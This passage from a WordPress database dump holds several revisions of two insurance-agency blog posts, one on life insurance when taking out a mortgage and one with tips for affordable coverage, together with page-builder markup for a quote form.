Quote Affect My Credit Score?','','inherit','closed','closed','','324-revision-v1','','','2023-03-14 13:50:32','2023-03-14 13:50:32','',324,'http://cmdev-site1.com/?p=326',0,'revision','',0),(327,3,'2023-03-14 13:55:41','2023-03-14 13:55:41','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nWithout a doubt, life insurance is designed to help protect you and your family, making it a vital piece of your financial planning.\r\n\r\nWith life insurance evolving over the years to provide different tiers of coverage to fit an evolving set of needs, life insurance is well worth considering no matter where you are in life.\r\n\r\nIn fact, one of the main reasons people consider a life insurance purchase is due to a mortgage payment.<sup>1</sup> But is life insurance really all that important when considering purchasing a house and making mortgage payments?\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Why You Should Consider Life Insurance If You’re Looking to Buy a Home</h3>\r\nWhile having life insurance isn’t strictly a necessity when purchasing a home, that doesn’t mean it isn’t a good thing to have. Here are a few reasons to consider a life insurance purchase before buying a home:\r\n<ul>\r\n 	<li>A mortgage is most likely the biggest bill your family will have. Buying a life insurance policy that would cover your mortgage debt can help protect your interest and prevent you from having to buy additional mortgage insurance when you buy your first home.<sup>1</sup></li>\r\n 	<li>If you are the sole or primary breadwinner in your home, there is a chance that your family would not be able to continue making mortgage payments in the event of your death. A life insurance policy has the potential to provide financial security to your family in the event of your death by allowing them the possibility to keep making mortgage payments after you die.<sup>2</sup></li>\r\n 	<li>Having life insurance in place when buying a home may sway a lender to rate your application more highly. The same may apply to landlords when seeking a buy-to-let mortgage.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup></li>\r\n</ul>\r\nWhile life insurance isn’t a necessity when buying a home, having a life insurance policy in place before proceeding with a house purchase has its share of benefits.\r\n\r\nIn some cases, having life insurance may help a lender rate your mortgage application more highly and give your family the financial security they need to continue living in their home long after your death.<sup>2</sup>\r\n\r\nThere are a number of life insurance options available, so it’s important to speak with a financial advisor or licensed insurance agent to help you decide which life insurance policy is best for you.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. The Balance, Who Needs Life Insurance? 10 Ways You Can Use Life Insurance, 2019, <a href=\"https://www.thebalance.com/who-needs-life-insurance-2645793\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.thebalance.com/who-needs-life-insurance-2645793</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Money to the Masses, Do you need life insurance to get a mortgage?, 2019, <a href=\"https://moneytothemasses.com/quick-savings/insurance-2/life-insurance/do-you-need-life-insurance-to-get-a-mortgage\" target=\"_blank\" rel=\"noopener noreferrer\">https://moneytothemasses.com/quick-savings/insurance-2/life-insurance/do-you-need-life-insurance-to-get-a-mortgage</a></span></em>','Why Is Life Insurance Important For Someone Getting A Mortgage?','','publish','open','open','','why-is-life-insurance-important-for-someone-getting-a-mortgage','','','2023-03-19 17:50:06','2023-03-19 17:50:06','',0,'http://cmdev-site1.com/?p=327',0,'post','',0),(330,1,'2023-03-14 13:54:36','2023-03-14 13:54:36','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.0\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" custom_padding=\"10px||||false|false\" custom_margin=\"-50px||||false|false\"][et_pb_row _builder_version=\"4.20.0\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.0\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" text_orientation=\"center\" custom_margin=\"||35px|||\"]<h3>How much life insurance do you need?</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Insurance Quote','','inherit','closed','closed','','225-revision-v1','','','2023-03-14 13:54:36','2023-03-14 13:54:36','',225,'http://cmdev-site1.com/?p=330',0,'revision','',0),(331,3,'2023-03-14 13:55:16','2023-03-14 13:55:16','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nWithout a doubt, life insurance is designed to help protect you and your family, making it a vital piece of your financial planning. With life insurance evolving over the years to provide different tiers of coverage to fit an evolving set of needs, life insurance is well worth considering no matter where you are in life.\r\n\r\nIn fact, one of the main reasons people consider a life insurance purchase is due to a mortgage payment.<sup>1</sup> But is life insurance really all that important when considering purchasing a house and making mortgage payments?\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Why You Should Consider Life Insurance If You’re Looking to Buy a Home</h3>\r\nWhile having life insurance isn’t strictly a necessity when purchasing a home, that doesn’t mean it isn’t a good thing to have. Here are a few reasons to consider a life insurance purchase before buying a home:\r\n<ul>\r\n 	<li>A mortgage is most likely the biggest bill your family will have. Buying a life insurance policy that would cover your mortgage debt can help protect your interest and prevent you from having to buy additional mortgage insurance when you buy your first home.<sup>1</sup></li>\r\n 	<li>If you are the sole or primary breadwinner in your home, there is a chance that your family would not be able to continue making mortgage payments in the event of your death. A life insurance policy has the potential to provide financial security to your family in the event of your death by allowing them the possibility to keep making mortgage payments after you die.<sup>2</sup></li>\r\n 	<li>Having life insurance in place when buying a home may sway a lender to rate your application more highly. The same may apply to landlords when seeking a buy-to-let mortgage.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup></li>\r\n</ul>\r\nWhile life insurance isn’t a necessity when buying a home, having a life insurance policy in place before proceeding with a house purchase has its share of benefits.\r\n\r\nIn some cases, having life insurance may help a lender rate your mortgage application more highly and give your family the financial security they need to continue living in their home long after your death.<sup>2</sup>\r\n\r\nThere are a number of life insurance options available, so it’s important to speak with a financial advisor or licensed insurance agent to help you decide which life insurance policy is best for you.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. The Balance, Who Needs Life Insurance? 10 Ways You Can Use Life Insurance, 2019, <a href=\"https://www.thebalance.com/who-needs-life-insurance-2645793\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.thebalance.com/who-needs-life-insurance-2645793</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Money to the Masses, Do you need life insurance to get a mortgage?, 2019, <a href=\"https://moneytothemasses.com/quick-savings/insurance-2/life-insurance/do-you-need-life-insurance-to-get-a-mortgage\" target=\"_blank\" rel=\"noopener noreferrer\">https://moneytothemasses.com/quick-savings/insurance-2/life-insurance/do-you-need-life-insurance-to-get-a-mortgage</a></span></em>','Why Is Life Insurance Important For Someone Getting A Mortgage?','','inherit','closed','closed','','327-revision-v1','','','2023-03-14 13:55:16','2023-03-14 13:55:16','',327,'http://cmdev-site1.com/?p=331',0,'revision','',0),(329,1,'2023-03-14 13:53:36','2023-03-14 13:53:36','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.0\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" custom_padding=\"10px||||false|false\" custom_margin=\"0px||||false|false\"][et_pb_row _builder_version=\"4.20.0\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.0\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" text_orientation=\"center\"]<h3>How much life insurance do you need?</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Insurance Quote','','inherit','closed','closed','','225-revision-v1','','','2023-03-14 13:53:36','2023-03-14 13:53:36','',225,'http://cmdev-site1.com/?p=329',0,'revision','',0),(332,3,'2023-03-14 13:55:41','2023-03-14 13:55:41','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nWithout a doubt, life insurance is designed to help protect you and your family, making it a vital piece of your financial planning.\r\n\r\nWith life insurance evolving over the years to provide different tiers of coverage to fit an evolving set of needs, life insurance is well worth considering no matter where you are in life.\r\n\r\nIn fact, one of the main reasons people consider a life insurance purchase is due to a mortgage payment.<sup>1</sup> But is life insurance really all that important when considering purchasing a house and making mortgage payments?\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Why You Should Consider Life Insurance If You’re Looking to Buy a Home</h3>\r\nWhile having life insurance isn’t strictly a necessity when purchasing a home, that doesn’t mean it isn’t a good thing to have. Here are a few reasons to consider a life insurance purchase before buying a home:\r\n<ul>\r\n 	<li>A mortgage is most likely the biggest bill your family will have. Buying a life insurance policy that would cover your mortgage debt can help protect your interest and prevent you from having to buy additional mortgage insurance when you buy your first home.<sup>1</sup></li>\r\n 	<li>If you are the sole or primary breadwinner in your home, there is a chance that your family would not be able to continue making mortgage payments in the event of your death. A life insurance policy has the potential to provide financial security to your family in the event of your death by allowing them the possibility to keep making mortgage payments after you die.<sup>2</sup></li>\r\n 	<li>Having life insurance in place when buying a home may sway a lender to rate your application more highly. The same may apply to landlords when seeking a buy-to-let mortgage.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup></li>\r\n</ul>\r\nWhile life insurance isn’t a necessity when buying a home, having a life insurance policy in place before proceeding with a house purchase has its share of benefits.\r\n\r\nIn some cases, having life insurance may help a lender rate your mortgage application more highly and give your family the financial security they need to continue living in their home long after your death.<sup>2</sup>\r\n\r\nThere are a number of life insurance options available, so it’s important to speak with a financial advisor or licensed insurance agent to help you decide which life insurance policy is best for you.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. The Balance, Who Needs Life Insurance? 10 Ways You Can Use Life Insurance, 2019, <a href=\"https://www.thebalance.com/who-needs-life-insurance-2645793\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.thebalance.com/who-needs-life-insurance-2645793</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Money to the Masses, Do you need life insurance to get a mortgage?, 2019, <a href=\"https://moneytothemasses.com/quick-savings/insurance-2/life-insurance/do-you-need-life-insurance-to-get-a-mortgage\" target=\"_blank\" rel=\"noopener noreferrer\">https://moneytothemasses.com/quick-savings/insurance-2/life-insurance/do-you-need-life-insurance-to-get-a-mortgage</a></span></em>','Why Is Life Insurance Important For Someone Getting A Mortgage?','','inherit','closed','closed','','327-revision-v1','','','2023-03-14 13:55:41','2023-03-14 13:55:41','',327,'http://cmdev-site1.com/?p=332',0,'revision','',0),(333,3,'2023-03-14 14:09:26','2023-03-14 14:09:26','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nBuying life insurance doesn’t mean you have to sacrifice the quality of your coverage.\r\n\r\nIn this blog, learn five tips to help secure life insurance that fits your budget without compromising the quality of the coverage you deserve.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>5 Tips and Tricks to Finding Affordable Life Insurance\r\n<span style=\"color: #ffffff;\">-</span></h3>\r\n<ol>\r\n 	<li><img class=\"alignleft size-medium wp-image-337\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-300x283.jpg\" alt=\"\" width=\"300\" height=\"283\" />Choose the best life insurance policy for your situation. Understanding what you and your family need is one of the first steps toward finding coverage. Consider your family’s unique set of needs and history, as well as all of your financial obligations. In doing so, you can help ensure that you select the right amount of coverage to fit your family’s needs while giving you the tools necessary to responsibly estimate the amount of coverage available for your financial situation.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Buy life insurance as early as possible. Life insurance may be significantly cheaper the younger you are when you purchase it. With increased age comes increased health risks, all of which can influence the premium rate of your policy. In fact, life insurance policy rates rise an average of eight to ten percent each year you put off applying.<sup>1</sup> To give yourself the best chance in finding a life insurance policy, buy early. This way, you may be able to lock in the same premium rates you have at a younger age for the duration of the policy—saving you money for years to come.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Use quote websites wisely. One of the fastest ways to review what type of life insurance may best fit your financial situation is through the use of a quote website. Quote websites are particularly useful as they provide users with a quick and easy way to view their life insurance options and possible costs. Make sure your quote websites compare quotes from multiple insurers to give yourself the best start!\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Consider a term life insurance policy—especially for those over 50 years of age. For those older in age, one may want to consider purchasing a term life insurance policy. A term life policy is often less expensive than a whole life insurance policy and typically only provides a death benefit in the event of the insured’s death so long as the death occurs during the duration of the policy.<sup>1</sup> However, despite term life policies lacking certain features associated with whole life, it doesn’t mean that term life policies are bad. In fact, term life policies have long been a viable option for young people and older generations alike and are well worth considering.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Work with an independent broker. Knowing how to get a life insurance policy is important, but so is recognizing when you need help in deciding on one. An independent broker can help inform you of life insurance products you should consider, provide valuable information on certain insurers, and help guide you through the process with ease. If you’re having trouble deciding on a policy—or just want some extra help—phoning your local, independent broker may be the best decision you make.</li>\r\n</ol>\r\nFinding life insurance doesn’t have to be difficult, but it does require a little bit of work.\r\n\r\nBy following these five tips and tricks, you can help improve your chances of finding the best life insurance policy to fit your needs without breaking the bank.\r\n\r\nRemember to do your research, weigh your options, compare your quotes wisely, and reach out for help when you need it most.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Investopedia, How Age Affects Life Insurance Rates, 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp</a></span></em>','5 Tips For Finding Life Insurance That Fits Your Budget','','publish','open','open','','5-tips-for-finding-life-insurance-that-fits-your-budget','','','2023-03-19 17:50:32','2023-03-19 17:50:32','',0,'http://cmdev-site1.com/?p=333',0,'post','',0),(334,3,'2023-03-14 13:59:30','2023-03-14 13:59:30','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nBuying life insurance doesn’t mean you have to sacrifice the quality of your coverage. In this blog, learn five tips to help secure life insurance that fits your budget without compromising the quality of the coverage you deserve.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>5 Tips and Tricks to Finding Affordable Life Insurance</h3>\r\n<ol>\r\n 	<li>Choose the best life insurance policy for your situation. Understanding what you and your family need is one of the first steps toward finding coverage. Consider your family’s unique set of needs and history, as well as all of your financial obligations. In doing so, you can help ensure that you select the right amount of coverage to fit your family’s needs while giving you the tools necessary to responsibly estimate the amount of coverage available for your financial situation.</li>\r\n 	<li>Buy life insurance as early as possible. Life insurance may be significantly cheaper the younger you are when you purchase it. With increased age comes increased health risks, all of which can influence the premium rate of your policy. In fact, life insurance policy rates rise an average of eight to ten percent each year you put off applying.<sup>1</sup> To give yourself the best chance in finding a life insurance policy, buy early. This way, you may be able to lock in the same premium rates you have at a younger age for the duration of the policy—saving you money for years to come.</li>\r\n 	<li>Use quote websites wisely. One of the fastest ways to review what type of life insurance may best fit your financial situation is through the use of a quote website. Quote websites are particularly useful as they provide users with a quick and easy way to view their life insurance options and possible costs. Make sure your quote websites compare quotes from multiple insurers to give yourself the best start!</li>\r\n 	<li>Consider a term life insurance policy—especially for those over 50 years of age. For those older in age, one may want to consider purchasing a term life insurance policy. A term life policy is often less expensive than a whole life insurance policy and typically only provides a death benefit in the event of the insured’s death so long as the death occurs during the duration of the policy.<sup>1</sup> However, despite term life policies lacking certain features associated with whole life, it doesn’t mean that term life policies are bad. In fact, term life policies have long been a viable option for young people and older generations alike and are well worth considering.</li>\r\n 	<li>Work with an independent broker. Knowing how to get a life insurance policy is important, but so is recognizing when you need help in deciding on one. An independent broker can help inform you of life insurance products you should consider, provide valuable information on certain insurers, and help guide you through the process with ease. If you’re having trouble deciding on a policy—or just want some extra help—phoning your local, independent broker may be the best decision you make.</li>\r\n</ol>\r\nFinding life insurance doesn’t have to be difficult, but it does require a little bit of work.\r\n\r\nBy following these five tips and tricks, you can help improve your chances of finding the best life insurance policy to fit your needs without breaking the bank.\r\n\r\nRemember to do your research, weigh your options, compare your quotes wisely, and reach out for help when you need it most.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Investopedia, How Age Affects Life Insurance Rates, 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp</a></span></em>','5 Tips For Finding Life Insurance That Fits Your Budget','','inherit','closed','closed','','333-revision-v1','','','2023-03-14 13:59:30','2023-03-14 13:59:30','',333,'http://cmdev-site1.com/?p=334',0,'revision','',0),(335,1,'2023-03-14 14:00:13','2023-03-14 14:00:13','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.0\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" custom_padding=\"10px||||false|false\" custom_margin=\"-50px||||false|false\"][et_pb_row _builder_version=\"4.20.0\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.0\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" text_orientation=\"center\" custom_margin=\"||35px|||\" header_3_font_size=\"25px\" header_3_font=\"|700|||||||\"]<h3>How much life insurance do you need?</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Insurance Quote','','inherit','closed','closed','','225-revision-v1','','','2023-03-14 14:00:13','2023-03-14 14:00:13','',225,'http://cmdev-site1.com/?p=335',0,'revision','',0),(336,1,'2023-03-14 14:01:14','2023-03-14 14:01:14','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.0\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" custom_padding=\"10px||||false|false\" custom_margin=\"-50px||||false|false\"][et_pb_row _builder_version=\"4.20.0\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.0\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" text_orientation=\"center\" custom_margin=\"||35px|||\" header_3_font_size=\"30px\" header_3_font=\"|700|||||||\"]<h3>How much life insurance do you need?</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Insurance Quote','','inherit','closed','closed','','225-revision-v1','','','2023-03-14 14:01:14','2023-03-14 14:01:14','',225,'http://cmdev-site1.com/?p=336',0,'revision','',0),(337,3,'2023-03-14 14:03:31','2023-03-14 14:03:31','','5 Good Tips Thought bubble Cropped 2866x2700','','inherit','open','closed','','5-good-tips-thought-bubble-cropped-2866x2700','','','2023-03-14 14:04:08','2023-03-14 14:04:08','',333,'http://cmdev-site1.com/wp-content/uploads/2023/03/5-Good-Tips-Thought-bubble-Cropped-2866x2700-1.jpg',0,'attachment','image/jpeg',0),(338,3,'2023-03-14 14:04:17','2023-03-14 14:04:17','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\n<img class=\"alignleft size-medium wp-image-337\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-300x283.jpg\" alt=\"\" width=\"300\" height=\"283\" />Buying life insurance doesn’t mean you have to sacrifice the quality of your coverage. In this blog, learn five tips to help secure life insurance that fits your budget without compromising the quality of the coverage you deserve.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>5 Tips and Tricks to Finding Affordable Life Insurance</h3>\r\n<ol>\r\n 	<li>Choose the best life insurance policy for your situation. Understanding what you and your family need is one of the first steps toward finding coverage. Consider your family’s unique set of needs and history, as well as all of your financial obligations. In doing so, you can help ensure that you select the right amount of coverage to fit your family’s needs while giving you the tools necessary to responsibly estimate the amount of coverage available for your financial situation.</li>\r\n 	<li>Buy life insurance as early as possible. Life insurance may be significantly cheaper the younger you are when you purchase it. With increased age comes increased health risks, all of which can influence the premium rate of your policy. In fact, life insurance policy rates rise an average of eight to ten percent each year you put off applying.<sup>1</sup> To give yourself the best chance in finding a life insurance policy, buy early. This way, you may be able to lock in the same premium rates you have at a younger age for the duration of the policy—saving you money for years to come.</li>\r\n 	<li>Use quote websites wisely. One of the fastest ways to review what type of life insurance may best fit your financial situation is through the use of a quote website. Quote websites are particularly useful as they provide users with a quick and easy way to view their life insurance options and possible costs. Make sure your quote websites compare quotes from multiple insurers to give yourself the best start!</li>\r\n 	<li>Consider a term life insurance policy—especially for those over 50 years of age. For those older in age, one may want to consider purchasing a term life insurance policy. A term life policy is often less expensive than a whole life insurance policy and typically only provides a death benefit in the event of the insured’s death so long as the death occurs during the duration of the policy.<sup>1</sup> However, despite term life policies lacking certain features associated with whole life, it doesn’t mean that term life policies are bad. In fact, term life policies have long been a viable option for young people and older generations alike and are well worth considering.</li>\r\n 	<li>Work with an independent broker. Knowing how to get a life insurance policy is important, but so is recognizing when you need help in deciding on one. An independent broker can help inform you of life insurance products you should consider, provide valuable information on certain insurers, and help guide you through the process with ease. If you’re having trouble deciding on a policy—or just want some extra help—phoning your local, independent broker may be the best decision you make.</li>\r\n</ol>\r\nFinding life insurance doesn’t have to be difficult, but it does require a little bit of work.\r\n\r\nBy following these five tips and tricks, you can help improve your chances of finding the best life insurance policy to fit your needs without breaking the bank.\r\n\r\nRemember to do your research, weigh your options, compare your quotes wisely, and reach out for help when you need it most.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Investopedia, How Age Affects Life Insurance Rates, 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp</a></span></em>','5 Tips For Finding Life Insurance That Fits Your Budget','','inherit','closed','closed','','333-revision-v1','','','2023-03-14 14:04:17','2023-03-14 14:04:17','',333,'http://cmdev-site1.com/?p=338',0,'revision','',0),(339,3,'2023-03-14 14:05:08','2023-03-14 14:05:08','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\n<img class=\"alignleft size-medium wp-image-337\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-300x283.jpg\" alt=\"\" width=\"300\" height=\"283\" />Buying life insurance doesn’t mean you have to sacrifice the quality of your coverage.\r\n\r\nIn this blog, learn five tips to help secure life insurance that fits your budget without compromising the quality of the coverage you deserve.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>5 Tips and Tricks to Finding Affordable Life Insurance</h3>\r\n<ol>\r\n 	<li>Choose the best life insurance policy for your situation. Understanding what you and your family need is one of the first steps toward finding coverage. Consider your family’s unique set of needs and history, as well as all of your financial obligations. In doing so, you can help ensure that you select the right amount of coverage to fit your family’s needs while giving you the tools necessary to responsibly estimate the amount of coverage available for your financial situation.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Buy life insurance as early as possible. Life insurance may be significantly cheaper the younger you are when you purchase it. With increased age comes increased health risks, all of which can influence the premium rate of your policy. In fact, life insurance policy rates rise an average of eight to ten percent each year you put off applying.<sup>1</sup> To give yourself the best chance in finding a life insurance policy, buy early. This way, you may be able to lock in the same premium rates you have at a younger age for the duration of the policy—saving you money for years to come.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Use quote websites wisely. One of the fastest ways to review what type of life insurance may best fit your financial situation is through the use of a quote website. Quote websites are particularly useful as they provide users with a quick and easy way to view their life insurance options and possible costs. Make sure your quote websites compare quotes from multiple insurers to give yourself the best start!\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Consider a term life insurance policy—especially for those over 50 years of age. For those older in age, one may want to consider purchasing a term life insurance policy. A term life policy is often less expensive than a whole life insurance policy and typically only provides a death benefit in the event of the insured’s death so long as the death occurs during the duration of the policy.<sup>1</sup> However, despite term life policies lacking certain features associated with whole life, it doesn’t mean that term life policies are bad. In fact, term life policies have long been a viable option for young people and older generations alike and are well worth considering.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Work with an independent broker. Knowing how to get a life insurance policy is important, but so is recognizing when you need help in deciding on one. An independent broker can help inform you of life insurance products you should consider, provide valuable information on certain insurers, and help guide you through the process with ease. If you’re having trouble deciding on a policy—or just want some extra help—phoning your local, independent broker may be the best decision you make.</li>\r\n</ol>\r\nFinding life insurance doesn’t have to be difficult, but it does require a little bit of work.\r\n\r\nBy following these five tips and tricks, you can help improve your chances of finding the best life insurance policy to fit your needs without breaking the bank.\r\n\r\nRemember to do your research, weigh your options, compare your quotes wisely, and reach out for help when you need it most.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Investopedia, How Age Affects Life Insurance Rates, 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp</a></span></em>','5 Tips For Finding Life Insurance That Fits Your Budget','','inherit','closed','closed','','333-revision-v1','','','2023-03-14 14:05:08','2023-03-14 14:05:08','',333,'http://cmdev-site1.com/?p=339',0,'revision','',0),(340,3,'2023-03-14 14:08:03','2023-03-14 14:08:03','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nBuying life insurance doesn’t mean you have to sacrifice the quality of your coverage.\r\n\r\nIn this blog, learn five tips to help secure life insurance that fits your budget without compromising the quality of the coverage you deserve.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>5 Tips and Tricks to Finding Affordable Life Insurance</h3>\r\n<ol>\r\n 	<li>Choose the best life insurance policy for your situation. Understanding what you and your family need is one of the first steps toward finding coverage. Consider your family’s unique set of needs and history, as well as all of your financial obligations. In doing so, you can help ensure that you select the right amount of coverage to fit your family’s needs while giving you the tools necessary to responsibly estimate the amount of coverage available for your financial situation.\r\n<span style=\"color: #ffffff;\"><img class=\"alignleft size-medium wp-image-337\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-300x283.jpg\" alt=\"\" width=\"300\" height=\"283\" />-</span></li>\r\n 	<li>Buy life insurance as early as possible. Life insurance may be significantly cheaper the younger you are when you purchase it. With increased age comes increased health risks, all of which can influence the premium rate of your policy. In fact, life insurance policy rates rise an average of eight to ten percent each year you put off applying.<sup>1</sup> To give yourself the best chance in finding a life insurance policy, buy early. This way, you may be able to lock in the same premium rates you have at a younger age for the duration of the policy—saving you money for years to come.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Use quote websites wisely. One of the fastest ways to review what type of life insurance may best fit your financial situation is through the use of a quote website. Quote websites are particularly useful as they provide users with a quick and easy way to view their life insurance options and possible costs. Make sure your quote websites compare quotes from multiple insurers to give yourself the best start!\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Consider a term life insurance policy—especially for those over 50 years of age. For those older in age, one may want to consider purchasing a term life insurance policy. A term life policy is often less expensive than a whole life insurance policy and typically only provides a death benefit in the event of the insured’s death so long as the death occurs during the duration of the policy.<sup>1</sup> However, despite term life policies lacking certain features associated with whole life, it doesn’t mean that term life policies are bad. In fact, term life policies have long been a viable option for young people and older generations alike and are well worth considering.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Work with an independent broker. Knowing how to get a life insurance policy is important, but so is recognizing when you need help in deciding on one. An independent broker can help inform you of life insurance products you should consider, provide valuable information on certain insurers, and help guide you through the process with ease. If you’re having trouble deciding on a policy—or just want some extra help—phoning your local, independent broker may be the best decision you make.</li>\r\n</ol>\r\nFinding life insurance doesn’t have to be difficult, but it does require a little bit of work.\r\n\r\nBy following these five tips and tricks, you can help improve your chances of finding the best life insurance policy to fit your needs without breaking the bank.\r\n\r\nRemember to do your research, weigh your options, compare your quotes wisely, and reach out for help when you need it most.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. 